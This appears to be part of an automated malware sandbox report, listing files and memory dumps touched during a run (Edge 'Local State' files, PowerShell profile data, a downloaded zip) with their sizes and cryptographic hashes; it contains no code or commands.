ba47c116fd28aaabd8ebe49810c6a4c8a7cfbe778f962fca15ac01df681479ef608d8b98839777a20e0945d416a604535576d790578475266d309d5e83a9734b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6d935618c92b63225a1ab437c07c64e5

SHA1
68ffd67e492b3cd07e33bd268cdcc9c0c19230ed

SHA256
6c22aef4bb3f3a82cd594ab34e496afcac99de68fe27a8fa94ae51493efc70db

SHA512
4b8b68854aafd0751c2fd6ecdd3e0bafd792c179fac2ccdc1ef542aa3ac5eafdd5763d5f593a7c3ed0ff303ffaa44dbf23b3c01cf3ffa29217867cf6595a64ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
7af10b8fd5651fc2f048037e4aaf76e9

SHA1
e8023a827b7b3f5b450d87f066335397ea26e29b

SHA256
21f6313f56a415f2a87d78325d850c7facf407172ce91dbc691300e0553d2903

SHA512
6c315a7a314140afb580e23ae3f77a445c7b691115d6f4366a02e9d53b42f0f837df77d0b985448e464de586f2341d752e7221eb51fe8efbb1a0ffe7c1109fab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
13KB

MD5
db177929dba158f1a95e7310e13c62e6

SHA1
a1664805180ca10e87df267831120bbe280d971d

SHA256
f766b1607e871ad60f7ad8affc5a42401e04183234450814026b4a48e9fe3f4d

SHA512
e0cda2a3fa02bb9b95ec7f2f6ccf6eb5d0c358f7b308a42cd9244968fe0aa2e59a40eb636fd643385c6e30b62b04a4ef3b4704d1e40881e48aa6b46078c52dbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e7a623fcc311b5017c82b1181911569

SHA1
048d36afc6481760c53cff348c05744d98f3cce7

SHA256
9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d

SHA512
3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm1k2z5l.vde.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
256cbb92e56dfb115e754bdd46402a20

SHA1
174344d1bf96ea32e2f0b84c282e8c58d6ce660f

SHA256
80654cf942b9fc22b55731dd7cc4480f61d733025cde8464cb972ec55773141f

SHA512
152f2b871a4391a62e972d12910faf35b5f390d234445a1b7ec216f70957e24cfed22d408f732adbf37ba3d8fb096e0acc6bcfc4ebea9e5bd3d9e7fd2aaece6e

Download Submit
C:\Users\Admin\Downloads\fgz.zip

Filesize
14KB

MD5
66f354fafeb5990a63c942c40b3e8d33

SHA1
da2a8a21d79d210c19a7ba8bb6b63f938407a419

SHA256
55f00b75e199e409f5e4485ba97f61d451435735d82e91e6cfe63a09de63e1b6

SHA512
3a1cf9e49f1d98c2e848aa1436ae3ecfd8f06e3a9b16e279bbdd8e07832395c9e32e8389dda120f1b347ab40d9a73135572f6270ddb39b830fc0b9c91807256b

Download Submit
memory/1544-144-0x000001E0231E0000-0x000001E0231F0000-memory.dmp

Filesize
64KB

Download
memory/1544-148-0x000001E023F40000-0x000001E02415C000-memory.dmp

Filesize
2.1MB

Download
memory/1544-138-0x000001E023F10000-0x000001E023F32000-memory.dmp

Filesize
136KB

Download
memory/1544-145-0x000001E0231E0000-0x000001E0231F0000-memory.dmp

Filesize
64KB

Download
memory/1544-143-0x000001E0231E0000-0x000001E0231F0000-memory.dmp

Filesize
64KB

Download
memory/4208-381-0x0000017C25B40000-0x0000017C25B50000-memory.dmp

Filesize
64KB

Download
memory/4208-382-0x0000017C25B40000-0x0000017C25B50000-memory.dmp

Filesize
64KB

Download
memory/4208-383-0x0000017C25B40000-0x0000017C25B50000-memory.dmp

Filesize
64KB

Download
memory/5044-334-0x000002532FE10000-0x000002532FE20000-memory.dmp

Filesize
64KB

Download
memory/5044-354-0x000002532FE10000-0x000002532FE20000-memory.dmp

Filesize
64KB

Download
memory/5044-333-0x000002532FE10000-0x000002532FE20000-memory.dmp

Filesize
64KB

Download